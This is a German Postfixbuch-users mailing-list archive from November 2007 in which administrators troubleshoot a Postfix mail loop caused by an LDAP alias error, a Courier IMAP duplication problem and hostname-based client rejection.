Mit freundlichem Gruß Peter Bauernfeind From r.felber at ek-muc.de Fri Nov 9 15:05:05 2007 From: r.felber at ek-muc.de (Robert Felber) Date: Fri, 9 Nov 2007 15:05:05 +0100 Subject: [Postfixbuch-users] [OT] Live Bundestagsstream: Abstimmung VDS In-Reply-To: <006301c822d8$f374fd70$2200a8c0@netclusive.local> References: <20071109124542.GA79707@robtone.ek-muc.de> <006301c822d8$f374fd70$2200a8c0@netclusive.local> Message-ID: <20071109140505.GA95506@robtone.ek-muc.de> On Fri, Nov 09, 2007 at 03:00:33PM +0100, crandler wrote: > > Sorry, fuers OT: > > > > http://www.vorratsdatenspeicherung.de/content/view/164/1/lang,de/ > > > > Links zu div live streams. > > > > (bei mir funktioniert phoenix + windows media am besten) > > Beschlossene Sache. Jau, wobei ich immernoch nicht schluessig bin, in welchen Bereichen das auch die priv. Benutzung am Arbeitsplatz betrifft (SMTP/E-mail ist klar, aber, welche Daten einer priv. Nutzung muessen Unternehmen noch erheben?). -- Robert Felber (PGP: 896CF30B) Munich, Germany From marc.samendinger at sp-online.de Fri Nov 9 15:06:15 2007 From: marc.samendinger at sp-online.de (Marc Samendinger) Date: Fri, 9 Nov 2007 15:06:15 +0100 Subject: [Postfixbuch-users] said: 554 5.4.0 Error: too many hops (in reply to end of DATA command)) In-Reply-To: <4734660B.8070108@reba-eno.de> References: <334826866@web.de> <4734660B.8070108@reba-eno.de> Message-ID: <20071109140615.GA19521@barracuda.sp-online.de> On Fri, Nov 09, 2007 at 02:52:11PM +0100, Peter Bauernfeind wrote: > Tanja Moeser schrieb:Kurz und bündig: Dein relayhost ist der interne > Mailserver nicht der DMZ, der DMZ relay zum Relayhost (intern) Wow... Geht das nach kurz und bündig auch noch verständlich? ;OP > Mit freundlichem Gruß > Peter Bauernfeind Gruß Marc From cite at incertum.net Fri Nov 9 15:08:19 2007 From: cite at incertum.net (Stefan =?utf-8?Q?F=C3=B6rster?=) Date: Fri, 9 Nov 2007 15:08:19 +0100 Subject: [Postfixbuch-users] said: 554 5.4.0 Error: too many hops (in reply to end of DATA command)) In-Reply-To: <334826866@web.de> References: <334826866@web.de> Message-ID: <20071109140818.GA7087@mail.incertum.net> * Tanja Moeser wrote: > main.cf (interner Mailserver): > virtual_recipient_maps = ldap:/etc/postfix/ldap_mbox.cf > virtual_alias_maps = ldap:/etc/postfix/ldap_alias.cf > virtual_mailbox_maps = ldap:/etc/postfix/ldap_dir.cf > virtual_mailbox_domains= ldap:/etc/postfix/ldap_domain.cf Ich setze 10 Euro-Cent darauf, daß hier nirgendwo ein "tanja at domain2.de" gefunden wird. > Hier noch der Auszug aus dem Log (der eingetnliche Eintrag ist elend lang) des DMZ-Rechners: > Nov 9 14:22:28 proxy postfix/smtpd[4074]: connect from fmmailgate04.web.de[217.72.192.242] > Nov 9 14:22:29 proxy postfix/qmgr[3781]: 0F39D41C2EF: from=, size=1328, nrcpt=1 (queue active) Rein. > Nov 9 14:22:32 proxy postfix/smtp[4085]: 7166A41C2F7: to=, relay=192.168.1.7[192.168.1.7]:25, delay=0.44, delays=0.2/0.02/0.17/0.04, dsn=2.0.0, status=sent (250 2.0.0 Ok: queued as 1A409D0054) Raus. Soweit in Ordnung. > Nov 9 14:22:32 proxy postfix/smtpd[4074]: E17AD41C2EF: client=unknown[192.168.1.7] > Nov 9 14:22:34 proxy postfix/qmgr[3781]: 2227C41C2F7: from=, size=5763, nrcpt=1 (queue active) Und wieder rein. Der interne Mailserver weiß nicht, daß er die Endstation für "tanja at domain2.de" ist. Was sagt denn: postmap -q tanja at domain2.de ldap:/etc/postfix/ldap_dir.cf Ciao Stefan -- Stefan Förster http://www.incertum.net/ Public Key: 0xBBE2A9E9 Life's too short to read boring signatures. From peter.bauernfeind at reba-eno.de Fri Nov 9 15:11:39 2007 From: peter.bauernfeind at reba-eno.de (Peter Bauernfeind) Date: Fri, 09 Nov 2007 15:11:39 +0100 Subject: [Postfixbuch-users] said: 554 5.4.0 Error: too many hops (in reply to end of DATA command)) In-Reply-To: <20071109140615.GA19521@barracuda.sp-online.de> References: <334826866@web.de> <4734660B.8070108@reba-eno.de> <20071109140615.GA19521@barracuda.sp-online.de> Message-ID: <47346A9B.1040905@reba-eno.de> Marc Samendinger schrieb: > On Fri, Nov 09, 2007 at 02:52:11PM +0100, Peter Bauernfeind wrote: > >> Tanja Moeser schrieb: >> Kurz und bündig: Dein relayhost ist der interne >> Mailserver nicht der DMZ, der DMZ relay zum Relayhost (intern) >> > > Wow... Geht das nach kurz und bündig auch noch verständlich? ;OP > > Ja, da hat mir der Donnervogel einen streich gespielt. Auf dem DMZ hast du keinen relayhost eingetragen. Der "relayhost" sagt, *wohin* die Mails gehen sollten. Auf deinem internen Mailserver hast du einen "relayhost" angegeben, somit schickst du alles von intern zum DMZ. Mit freundlichem Gruß Peter Bauernfeind From cite at incertum.net Fri Nov 9 15:14:06 2007 From: cite at incertum.net (Stefan =?utf-8?Q?F=C3=B6rster?=) Date: Fri, 9 Nov 2007 15:14:06 +0100 Subject: [Postfixbuch-users] said: 554 5.4.0 Error: too many hops (in reply to end of DATA command)) In-Reply-To: <47346A9B.1040905@reba-eno.de> References: <334826866@web.de> <4734660B.8070108@reba-eno.de> <20071109140615.GA19521@barracuda.sp-online.de> <47346A9B.1040905@reba-eno.de> Message-ID: <20071109141406.GB7087@mail.incertum.net> * Peter Bauernfeind wrote: > Auf dem DMZ hast du keinen relayhost eingetragen. Der "relayhost" sagt, > *wohin* die Mails gehen sollten. > Auf deinem internen Mailserver hast du einen "relayhost" angegeben, > somit schickst du alles von intern zum DMZ. Woah, woah, langsam. Wie kommst Du denn darauf? Die Mails werden vom DMZ-Server korrekt - transport_maps ist gesetzt - an den internen Server weitergereicht. Der OP schrieb doch, daß der Mailversand nach außen hin klappt. Ciao Stefan -- Stefan Förster http://www.incertum.net/ Public Key: 0xBBE2A9E9 FdI #244: Restart - Beliebte Übung, um nicht in das Zweifingertippsystem zurück zu fallen. (Manfred Worm Schäfer) From new_zealand at gmx.de Fri Nov 9 15:18:25 2007 From: new_zealand at gmx.de (Tanja Moeser) Date: Fri, 09 Nov 2007 15:18:25 +0100 Subject: [Postfixbuch-users] =?iso-8859-15?q?said=3A_554_5=2E4=2E0_Error?= =?iso-8859-15?q?=3A_too_many_hops_=28in_reply_to_end_of_DATA_command=29?= =?iso-8859-15?q?=29?= Message-ID: <334892936@web.de> > Auf dem DMZ hast du keinen relayhost eingetragen. Der "relayhost" sagt, > *wohin* die Mails gehen sollten. > Auf deinem internen Mailserver hast du einen "relayhost" angegeben, > somit schickst du alles von intern zum DMZ. Ich muss doch in der DMZ bei relayhost gar nichts eintragen? Der Versand klappt ja... Werde mal dem Hinweis mit den LDAP-Files nachgehen... _______________________________________________________________________ Jetzt neu! Schützen Sie Ihren PC mit McAfee und WEB.DE. 3 Monate kostenlos testen. http://www.pc-sicherheit.web.de/startseite/?mc=022220 From cite at incertum.net Fri Nov 9 15:23:06 2007 From: cite at incertum.net (Stefan =?utf-8?Q?F=C3=B6rster?=) Date: Fri, 9 Nov 2007 15:23:06 +0100 Subject: [Postfixbuch-users] said: 554 5.4.0 Error: too many hops (in reply to end of DATA command)) In-Reply-To: <20071109141406.GB7087@mail.incertum.net> References: <334826866@web.de> <4734660B.8070108@reba-eno.de> <20071109140615.GA19521@barracuda.sp-online.de> <47346A9B.1040905@reba-eno.de> <20071109141406.GB7087@mail.incertum.net> Message-ID: <20071109142306.GC7087@mail.incertum.net> * Stefan Förster wrote: > Der OP schrieb doch, daß der Mailversand nach außen hin klappt. Äh, Mift. "Die OP". No offense intended. Ciao Stefan -- Stefan Förster http://www.incertum.net/ Public Key: 0xBBE2A9E9 25 Zeichen, daß Du erwachsen bist, Nummer drei: Du hast mehr Essen als Bier im Kühlschrank. From peter.bauernfeind at reba-eno.de Fri Nov 9 15:26:01 2007 From: peter.bauernfeind at reba-eno.de (Peter Bauernfeind) Date: Fri, 09 Nov 2007 15:26:01 +0100 Subject: [Postfixbuch-users] said: 554 5.4.0 Error: too many hops (in reply to end of DATA command)) In-Reply-To: <20071109141406.GB7087@mail.incertum.net> References: <334826866@web.de> <4734660B.8070108@reba-eno.de> <20071109140615.GA19521@barracuda.sp-online.de> <47346A9B.1040905@reba-eno.de> <20071109141406.GB7087@mail.incertum.net> Message-ID: <47346DF9.1030700@reba-eno.de> Stefan Förster schrieb: > * Peter Bauernfeind wrote: > >> Auf dem DMZ hast du keinen relayhost eingetragen. Der "relayhost" sagt, >> *wohin* die Mails gehen sollten. >> Auf deinem internen Mailserver hast du einen "relayhost" angegeben, >> somit schickst du alles von intern zum DMZ. >> > > Woah, woah, langsam. Wie kommst Du denn darauf? Die Mails werden vom > DMZ-Server korrekt - transport_maps ist gesetzt - an den internen > Server weitergereicht. > > Der OP schrieb doch, daß der Mailversand nach außen hin klappt. > > Ja gut dann tu ich langsam, ist eh bald Wochenende. :-) Der Mail versand nach außen schon, nur eben mit der Bemerkung, daß die Mails nochmal durch den Scanner laufen, was anscheinend nicht gewünscht wird. Deshalb vom internen kein relayhost auf den DMZ. OK, ich habe nochmal gelesen. Stimmt, hast recht, war auch kein Scanner sondern Spam beim Empfänger. Aber dennoch scheint mir die Konfiguration etwas "wackelig". Oder anders gesagt, in den configs stehen zuviel Änderungen, die die OPin, denke ich, nicht genau bedacht hat. Denn Hops haben mit Transport zu tun, da war eben mein erster Gedanke relayhost. Zusammen mit dem "mydestination =" loop er eben zum DMZ. Mit freundlichem Gruß Peter Bauernfeind From cite at incertum.net Fri Nov 9 15:43:00 2007 From: cite at incertum.net (Stefan =?utf-8?Q?F=C3=B6rster?=) Date: Fri, 9 Nov 2007 15:43:00 +0100 Subject: [Postfixbuch-users] said: 554 5.4.0 Error: too many hops (in reply to end of DATA command)) In-Reply-To: <47346DF9.1030700@reba-eno.de> References: <334826866@web.de> <4734660B.8070108@reba-eno.de> <20071109140615.GA19521@barracuda.sp-online.de> <47346A9B.1040905@reba-eno.de> <20071109141406.GB7087@mail.incertum.net> <47346DF9.1030700@reba-eno.de> Message-ID: <20071109144300.GD7087@mail.incertum.net> * Peter Bauernfeind wrote: > Oder anders gesagt, in den configs stehen zuviel Änderungen, die die > OPin, denke ich, nicht genau bedacht hat. Schon, aber andere Baustelle und so ;-) > Denn Hops haben mit Transport zu tun, da war eben mein erster > Gedanke relayhost. Zusammen mit dem "mydestination =" loop er eben > zum DMZ. Ohne in irgendeiner Weise böswillig oder überheblich wirken zu wollen: Diese Fragestellung ist wirklich gut dokumentiert und Deine Aussage macht so alleinstehend keinen Sinn: http://www.postfix.org/ADDRESS_CLASS_README.html http://www.postfix.org/VIRTUAL_README.html Bei mir z.B. steht privat die "billigmail.org" auch nicht in $mydestination. Schauen wir uns das auf einer VM an: vmware02:/etc/postfix# postconf -n alias_database = hash:/etc/aliases alias_maps = hash:/etc/aliases append_dot_mydomain = no biff = no config_directory = /etc/postfix inet_interfaces = all inet_protocols = ipv4 mailbox_command = procmail -a "$EXTENSION" mailbox_size_limit = 0 mydestination = myhostname = vmware02.cite.lan mynetworks = 127.0.0.0/8 myorigin = /etc/mailname recipient_delimiter = + relayhost = smtpd_banner = $myhostname ESMTP $mail_name (Debian/GNU) virtual_gid_maps = static:5000 virtual_mailbox_base = /home/vmailboxes virtual_mailbox_domains = billigmail.org virtual_mailbox_limit = 512000000 virtual_mailbox_maps = hash:/etc/postfix/virtuals virtual_minimum_uid = 100 virtual_uid_maps = static:5000 vmware02:/etc/postfix# cat virtuals cite at billigmail.org billigmail.org/cite jost at billigmail.org billigmail.org/jost vmware02:/etc/postfix# postmap virtuals vmware02:/etc/postfix# postconf mydestination mydestination = vmware02:/etc/postfix# echo hallo | mail cite at billigmail.org vmware02:/etc/postfix# tail -8 /var/log/mail.log Nov 9 13:14:50 vmware02 postfix/pickup[2876]: 0CA3517CFF: uid=0 from= Nov 9 13:14:50 vmware02 postfix/cleanup[2879]: 0CA3517CFF: message-id=<20071109121450.0CA3517CFF at vmware02.cite.lan> Nov 9 13:14:50 vmware02 postfix/qmgr[2877]: 0CA3517CFF: from=, size=287, nrcpt=1 (queue active) Nov 9 13:14:50 vmware02 postfix/virtual[2884]: table hash:/etc/postfix/virtuals(0,lock|no_regsub|no_proxy|no_unauth) has changed -- restarting Nov 9 13:14:50 vmware02 postfix/virtual[2882]: table hash:/etc/postfix/virtuals(0,lock|no_regsub|no_proxy|no_unauth) has changed -- restarting Nov 9 13:14:50 vmware02 postfix/virtual[2895]: table hash:/etc/postfix/virtuals(0,lock|no_regsub|no_proxy|no_unauth) has changed -- restarting Nov 9 13:14:50 vmware02 postfix/virtual[2907]: 0CA3517CFF: to=, relay=virtual, delay=0.21, delays=0.09/0.09/0/0.04, dsn=2.0.0, status=sent (delivered to mailbox) Nov 9 13:14:50 vmware02 postfix/qmgr[2877]: 0CA3517CFF: removed Man sieht: Da loopt gar nüscht. Ciao Stefan -- Stefan Förster http://www.incertum.net/ Public Key: 0xBBE2A9E9 FdI #204: Finanzbeamter - Ein fast-Sysadmin-Beruf, wo man wundervoll Leute larten kann. (Jürgen Nieveler) From m.ockert at bss-services.de Fri Nov 9 15:49:41 2007 From: m.ockert at bss-services.de (Fred Ockert) Date: Fri, 09 Nov 2007 15:49:41 +0100 Subject: [Postfixbuch-users] said: 554 5.4.0 Error: too many hops (in reply to end of DATA command)) In-Reply-To: <334826866@web.de> References: <334826866@web.de> Message-ID: <47347385.8090406@bss-services.de> Tanja Moeser schrieb: > Hallo da draussen, (sorry, wenn es etwas unübersichtlich wird in der Mail) > > ich habe leider ein Problem mit der Auslieferung der eMails an den internen Mailserver. > Die Mails scheinen in einer Dauerschleife zwischen DMZ und internem LAN hin-und her zu wandern bis irgendwann Postfix "said: 554 5.4.0 Error: too many hops (in reply to end of DATA command))" meldet. > > Hier mal meine main.cf (DMZ-Rechner): > smtpd_banner = mail.domain1.eu ESMTP > biff = no > debug_peer_level = 4 > append_dot_mydomain = no > transport_maps = hash:/etc/postfix/transport und hier kriegt er gesagt, was er wo abzuliefern hat! > relay_recipient_maps = hash:/etc/postfix/relay_recipients > myhostname = proxy.local > alias_maps = hash:/etc/aliases > alias_database = hash:/etc/aliases > myorigin = domain1.eu > mydestination = proxy.local, mail.local > relayhost = > relay_domains = domain1.eu, domain2.de der Mailserver liefert als direkt aus... > defer_transports = > mailbox_transport = > mynetworks = 127.0.0.0/8, 192.168.1.0/24 na ja... weiss er denn, wie er mynetworks erreicht ?? > mailbox_command = > mailbox_size_limit = 0 > recipient_delimiter = + > inet_interfaces = all > inet_protocols = all > smtpd_sasl_local_domain = > smtpd_sasl_auth_enable = yes > smtpd_sasl_security_options = noanonymous > broken_sasl_auth_clients = yes > smtpd_recipient_restrictions = permit_sasl_authenticated, permit_mynetworks, reject_unauth_destination > masquerade_exceptions = root > masquerade_classes = envelope_sender, header_sender, header_recipient > program_directory = /usr/lib/postfix > masquerade_domains = > disable_dns_lookups = no > default_transport = smtp > soft_bounce = no > content_filter = smtp-amavis:[127.0.0.1]:10024 > > > > main.cf (interner Mailserver): > > smtpd_banner = mail.domain1.eu ESMTP > biff = no > append_dot_mydomain = no > inet_interface = all > myhostname = mail.local > mydestination = > relayhost = [192.168.3.2] <---IP-DMZ alles muss raus...ausser my networks > mynetworks = 127.0.0.0/8, localhost, 192.168.3.2, 192.168.1.0/24, 192.168.2.0/24 > smtpd_sasl_security_options = noanonymous > broken_sasl_auth_clients = yes > smtpd_recipient_restrictions = permit_mynetworks, reject_unknown_recipient_domain, permit_sasl_authenticated, reject_unauth_destination > > mailbox_size_limit = 0 > recipient_delimiter = + > inet_interfaces = all > local_recipient_maps = ldap:/etc/postfix/ldap_mbox.cf > home_mailbox = /Maildir > virtual_transport = virtual > local_transport = virtual > virtual_recipient_maps = ldap:/etc/postfix/ldap_mbox.cf > virtual_alias_maps = ldap:/etc/postfix/ldap_alias.cf > virtual_mailbox_maps = ldap:/etc/postfix/ldap_dir.cf > virtual_uid_maps = ldap:/etc/postfix/ldap_uid.cf > virtual_gid_maps = ldap:/etc/postfix/ldap_gid.cf > virtual_mailbox_domains= ldap:/etc/postfix/ldap_domain.cf > virtual_mailbox_base = / > virtual_minimum_uid = 500 > virtual_mailbox_limit = 0 > > Das verschicken klappt (ausser das meine eigenen Mails als Spam beim Empfänger landen, aber andere Baustelle ;-) ). > Das interne Mailing klappt auch. > > Ich habe hier auf der Liste im Archiv einen ähnlichen Eintrag entdeckt, da kam es aber zu keiner Lösung. > Die Einträge von gmx und web.de hängen damit zusammen, dass mein privater gmx-account auf einen web.de-account (von dem aus ich diese Mail geschrieben habe) weitergeleitet werden. > > Vorab Danke und Gruß, > Tanja ich denke fast (?) .. du solltest es in transport_maps probieren! ohne nachzusehen (und nachzudenken...?) im DMZ-Recher eintragen... @ mydomain smtp:interner.mailserver @my_zweite_domain smtp:der.mailserver.der.es.bekommen.soll @domain2.de smtp:int.postfix.server dann weiss der DMZ-Rechner, was er wo abliefern muss... und er schickt tanja at domain2.de an den in der dritte Zeile genannten Server.. und der kann damit wohl was anfangen? also einfach besondere Transportwege definieren...scan kann man ggfs umgehen, indem man auf einem anderen Port einwirft (10025 z.B.) Da wiirft amavis eh alle bearbeiteten ein... Gruss Fred From cite at incertum.net Fri Nov 9 15:55:40 2007 From: cite at incertum.net (Stefan =?utf-8?Q?F=C3=B6rster?=) Date: Fri, 9 Nov 2007 15:55:40 +0100 Subject: [Postfixbuch-users] said: 554 5.4.0 Error: too many hops (in reply to end of DATA command)) In-Reply-To: <47347385.8090406@bss-services.de> References: <334826866@web.de> <47347385.8090406@bss-services.de> Message-ID: <20071109145540.GE7087@mail.incertum.net> Wie ich gerade Pusteln krieg! In meiner Bikini-Zone! * Fred Ockert wrote: >> mynetworks = 127.0.0.0/8, 192.168.1.0/24 > > na ja... weiss er denn, wie er mynetworks erreicht ?? Die (ich hab's gelernt!) OP hat einen _Logauszug_ mitgeliefert, wo ganz klar zu sehen ist, wie der DMZ-Server an den internen Server einliefert. > ich denke fast (?) .. du solltest es in transport_maps probieren! > ohne nachzusehen (und nachzudenken...?) im DMZ-Recher eintragen... > > @ mydomain smtp:interner.mailserver > @my_zweite_domain smtp:der.mailserver.der.es.bekommen.soll > @domain2.de smtp:int.postfix.server > > dann weiss der DMZ-Rechner, was er wo abliefern muss... und er schickt > tanja at domain2.de an den in der dritte Zeile genannten Server.. und der > kann damit wohl was anfangen? > also einfach besondere Transportwege definieren...scan kann man ggfs > umgehen, indem man auf einem anderen Port einwirft (10025 z.B.) > Da wiirft amavis eh alle bearbeiteten ein... Hast Du die Mail der OP _gelesen_? Die Fehlermeldung mit zu vielen Hops kam vom Server in der _DMZ_, weil er anhand der Received-Header in einer Mail, die vom _internen_ Server zurückkam, festgestellt hat, daß er diese Mail _schonmal_ bearbeitet hatte (und das sagt er ganz korrekt mit "554 Haumichblau!" nach dem End-of-DATA). Der DMZ-Server arbeitet, soweit das ersichtlich ist, korrekt. Ciao Stefan -- Stefan Förster http://www.incertum.net/ Public Key: 0xBBE2A9E9 FdI #47: Neue Version mit deutlich mehr Funktionalität. - Haben Sie schon die Speichererweiterung gekauft? (Kristian Köhntopp) From peter.bauernfeind at reba-eno.de Fri Nov 9 15:55:44 2007 From: peter.bauernfeind at reba-eno.de (Peter Bauernfeind) Date: Fri, 09 Nov 2007 15:55:44 +0100 Subject: [Postfixbuch-users] said: 554 5.4.0 Error: too many hops (in reply to end of DATA command)) In-Reply-To: <20071109144300.GD7087@mail.incertum.net> References: <334826866@web.de> <4734660B.8070108@reba-eno.de> <20071109140615.GA19521@barracuda.sp-online.de> <47346A9B.1040905@reba-eno.de> <20071109141406.GB7087@mail.incertum.net> <47346DF9.1030700@reba-eno.de> <20071109144300.GD7087@mail.incertum.net> Message-ID: <473474F0.7030000@reba-eno.de> Stefan Förster schrieb > Man sieht: Da loopt gar nüscht. Und was passiert, wenn da ein Schreibfehler drin steckt? Der DMZ schickt zum internen und der weiß von Nix, was dann? BTW, bin ich der Meinung, daß auf einem DMZ so wenig wie nur irgend möglich laufen sollte. Daraus folgt erst mal alle Mail nach drinen schaufeln und dort verteilen. Ja ist etwas Aufwand, hilft aber manchaml gegen die Paranoia. ;-) Mit freundlichem Gruß Peter Bauernfeind From cite at incertum.net Fri Nov 9 15:59:13 2007 From: cite at incertum.net (Stefan =?utf-8?Q?F=C3=B6rster?=) Date: Fri, 9 Nov 2007 15:59:13 +0100 Subject: [Postfixbuch-users] said: 554 5.4.0 Error: too many hops (in reply to end of DATA command)) In-Reply-To: <473474F0.7030000@reba-eno.de> References: <334826866@web.de> <4734660B.8070108@reba-eno.de> <20071109140615.GA19521@barracuda.sp-online.de> <47346A9B.1040905@reba-eno.de> <20071109141406.GB7087@mail.incertum.net> <47346DF9.1030700@reba-eno.de> <20071109144300.GD7087@mail.incertum.net> <473474F0.7030000@reba-eno.de> Message-ID: <20071109145913.GF7087@mail.incertum.net> * Peter Bauernfeind wrote: > Stefan Förster schrieb >> Man sieht: Da loopt gar nüscht. > > > Und was passiert, wenn da ein Schreibfehler drin steckt? Der DMZ schickt > zum internen und der weiß von Nix, was dann? Und deswegen die Bitte an die OP, ihre LDAP-Maps zu überprüfen. Weil ich nämlich genau das schon erzählt habe. Wochenende, Wochenende, Wochenende, Wochenende Stefan -- Stefan Förster http://www.incertum.net/ Public Key: 0xBBE2A9E9 FdI #46: Schulversion - legalisierte Raubkopie (Kristian Köhntopp) From peter.bauernfeind at reba-eno.de Fri Nov 9 16:01:43 2007 From: peter.bauernfeind at reba-eno.de (Peter Bauernfeind) Date: Fri, 09 Nov 2007 16:01:43 +0100 Subject: [Postfixbuch-users] said: 554 5.4.0 Error: too many hops (in reply to end of DATA command)) In-Reply-To: <20071109145913.GF7087@mail.incertum.net> References: <334826866@web.de> <4734660B.8070108@reba-eno.de> <20071109140615.GA19521@barracuda.sp-online.de> <47346A9B.1040905@reba-eno.de> <20071109141406.GB7087@mail.incertum.net> <47346DF9.1030700@reba-eno.de> <20071109144300.GD7087@mail.incertum.net> <473474F0.7030000@reba-eno.de> <20071109145913.GF7087@mail.incertum.net> Message-ID: <47347657.6060104@reba-eno.de> Stefan Förster schrieb: > * Peter Bauernfeind wrote: > >> Stefan Förster schrieb >> >>> Man sieht: Da loopt gar nüscht. >>> >> Und was passiert, wenn da ein Schreibfehler drin steckt? Der DMZ schickt >> zum internen und der weiß von Nix, was dann? >> > > Und deswegen die Bitte an die OP, ihre LDAP-Maps zu überprüfen. Weil > ich nämlich genau das schon erzählt habe. > > Und dabei auch gleich noch den ganzen Rest und so in Ordnung bringen. Es geht doch nichts über einen robusten Grundstock. > Wochenende, Wochenende, Wochenende, Wochenende > Unfair. ;-( :-) Mit freundlichem Gruß Peter Bauernfeind From new_zealand at gmx.de Fri Nov 9 16:12:43 2007 From: new_zealand at gmx.de (Tanja Moeser) Date: Fri, 09 Nov 2007 16:12:43 +0100 Subject: [Postfixbuch-users] =?iso-8859-15?q?said=3A_554_5=2E4=2E0_Error?= =?iso-8859-15?q?=3A_too_many_hops_=28in_reply_to_end_of_DATA_command=29?= =?iso-8859-15?q?=29?= Message-ID: <334949737@web.de> So, erst mal vielen Dank an alle. Es lag, wie Stefan mit seiner 10-cent-Wette richtig vermutete, an meiner ldap_alias.cf in Postfix auf dem DMZ-Rechner. Ich habe dort das Alias-Attribut vom LDAP nicht richtig gesetzt, daher kannte er die adresse nicht, ging zurück etc. Nun klappt et ;-) Dann mache ich mich mal an perdition (Danke Stefan *OT*). Schönes Wochenende, Tanja > > Stefan Förster schrieb: > > * Peter Bauernfeind wrote: > > > >> Stefan Förster schrieb > >> > >>> Man sieht: Da loopt gar nüscht. > >>> > >> Und was passiert, wenn da ein Schreibfehler drin steckt? Der DMZ schickt > >> zum internen und der weiß von Nix, was dann? > >> > > > > Und deswegen die Bitte an die OP, ihre LDAP-Maps zu überprüfen. Weil > > ich nämlich genau das schon erzählt habe. > > > > > Und dabei auch gleich noch den ganzen Rest und so in Ordnung bringen. Es > geht doch nichts über einen robusten Grundstock. > > Wochenende, Wochenende, Wochenende, Wochenende > > > Unfair. ;-( > > :-) > > Mit freundlichem Gruß > Peter Bauernfeind > > > > -- > _______________________________________________ > Postfixbuch-users -- http://www.postfixbuch.de > Heinlein Professional Linux Support GmbH > > Postfixbuch-users at listi.jpberlin.de > https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users > > _______________________________________________________________________ Jetzt neu! Schützen Sie Ihren PC mit McAfee und WEB.DE. 3 Monate kostenlos testen. http://www.pc-sicherheit.web.de/startseite/?mc=022220 From nospam at thoma.cc Fri Nov 9 17:49:36 2007 From: nospam at thoma.cc (Maximilian Thoma) Date: Fri, 09 Nov 2007 17:49:36 +0100 Subject: [Postfixbuch-users] Komisches verhalten von Courier IMAP-ssl Message-ID: <47348FA0.8010809@thoma.cc> Hallo Liste, ich habe Probleme mit meinem Courier-IMAP. Folgendes ist vorgefallen: ich habe aus meinem incoming ordner alle mails aus cur in ein mailarchiv mit mv auf der console verschoben. (geht schneller, ca. 6000 Mails) hat alles soweit geklappt, doch wenn ich das archiv aufmache geht die cpu auslastung auf 60% und er zeigt auch nach längerem warten keine mails an. schaut man sich das ganze jetzt auf der festplatte an haben sich die mails irgendwie vervielfacht. das log zeigt leider auch nichts verwertbares an bzw. man sieht halt nur die normalen login / logouts. mxadm at server / # find /srv/mail/domain.xx/abc/.Archiv.2007/cur/ -type f | wc -l 71903 die files sind plötzlich ~70000. warum ? was kann ich dagegen machen und wie bekomm ich meine mails wieder angezeigt. danke für eure hilfe im voraus. gruß maximilian -- \\|// (o o) --------------------------------------------------ooO-(_)-Ooo--- Maximilian Thoma PGP: http://mirror.thoma.cc/pgp/0x6AC4976A.asc Resistance is futile ... Do not use my spamtrap: spamtrap at thoma.cc - Thanks! Ooo. -------------------------------------------------.ooO----( )--- ( ) (_/ \_) From usenet at deiszner.de Fri Nov 9 19:22:04 2007 From: usenet at deiszner.de (Sebastian Deiszner) Date: Fri, 09 Nov 2007 19:22:04 +0100 Subject: [Postfixbuch-users] Verbindungsaufbau verhindern Message-ID: <4734A54C.8040205@deiszner.de> Hallo, eine Kommunikation mit Postfix beginnt ja mit: Nov 9 19:14:49 v1577 postfix/smtpd[13617]: connect from 160-147-114-200.fibertel.com.ar[200.114.147.160] Gibt es einen Prüfmechanismus in Postfix, mit welchem man z.B. eine Datei mit Regexp integrieren kann z.B. "Wenn der Hostname fibertel enthält, dann Verbindung beenden" ? Wenn ja, wie aktiviere ich den? DAmit würde man ja Postfix von der nachgelagerten Bearbeitung entlasten. gruß Sebastian ____________________________________________________________ Corps, Burschenschaft, Sängerschaft - das ist doch alles die selbe braune Sauce. Wir sitzen da in unseren Erdhöhlen, schwenken Hakenkreuzfahnen und gröhlen laut das Deutschlandlied - alle 97 Strophen gleichzeitig. Allerdings nur, wenn wir nicht gerade kleine Kinder fressen. (ARD-Tatort 28.10.2007) Gruß Sebastian Deiszner :-) http://www.deiszner.eu From driessen at fblan.de Fri Nov 9 19:37:17 2007 From: driessen at fblan.de (Uwe Driessen) Date: Fri, 9 Nov 2007 19:37:17 +0100 Subject: [Postfixbuch-users] Verbindungsaufbau verhindern In-Reply-To: <4734A54C.8040205@deiszner.de> References: <4734A54C.8040205@deiszner.de> Message-ID: <001101c822ff$8e4dd710$0565a8c0@uwe> Sebastian Deiszner schrieb: > Hallo, > > eine Kommunikation mit Postfix beginnt ja mit: > > > Nov 9 19:14:49 v1577 postfix/smtpd[13617]: connect from > 160-147-114-200.fibertel.com.ar[200.114.147.160] > > Gibt es einen Prüfmechanismus in Postfix, mit welchem man z.B. eine > Datei mit Regexp integrieren kann z.B. "Wenn der Hostname fibertel > enthält, dann Verbindung beenden" ? > > Wenn ja, wie aktiviere ich den? check_client_access pcre:/etc/postfix/maps/unerwuenscht /\.fibertel\.com\.ar$/ REJECT irgendwas Noch früher geht nicht und das direkt nach dem sasl_permit Sehen wirst du aber immer noch die Logeinträge connect, rauswurf, disconnect Noch früher geht so was nur mit IPtables > > DAmit würde man ja Postfix von der nachgelagerten Bearbeitung entlasten. > > gruß > > Sebastian Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 From Ralf.Hildebrandt at charite.de Fri Nov 9 20:00:03 2007 From: Ralf.Hildebrandt at charite.de (Ralf Hildebrandt) Date: Fri, 9 Nov 2007 20:00:03 +0100 Subject: [Postfixbuch-users] Verbindungsaufbau verhindern In-Reply-To: <001101c822ff$8e4dd710$0565a8c0@uwe> References: <4734A54C.8040205@deiszner.de> <001101c822ff$8e4dd710$0565a8c0@uwe> Message-ID: <20071109190003.GQ14506@charite.de> * Uwe Driessen : > check_client_access pcre:/etc/postfix/maps/unerwuenscht > > /\.fibertel\.com\.ar$/ REJECT irgendwas Das geht auch mit hash: fibertel.com.ar REJECT irgendwas .fibertel.com.ar REJECT irgendwas -- Ralf Hildebrandt (Ralf.Hildebrandt at charite.de) plonk at charite.de Postfix - Einrichtung, Betrieb und Wartung Tel. +49 (0)30-450 570-155 http://www.arschkrebs.de "The danger from computers is not that they will eventually get as smart as men, but we will meanwhile agree to meet them halfway."-Bernard Avishai From postfixbuch-users at japantest.homelinux.com Fri Nov 9 23:02:32 2007 From: postfixbuch-users at japantest.homelinux.com (Sandy Drobic) Date: Fri, 09 Nov 2007 23:02:32 +0100 Subject: [Postfixbuch-users] Verbindungsaufbau verhindern In-Reply-To: <4734A54C.8040205@deiszner.de> References: <4734A54C.8040205@deiszner.de> Message-ID: <4734D8F8.4090908@japantest.homelinux.com> Sebastian Deiszner wrote: > Hallo, > > 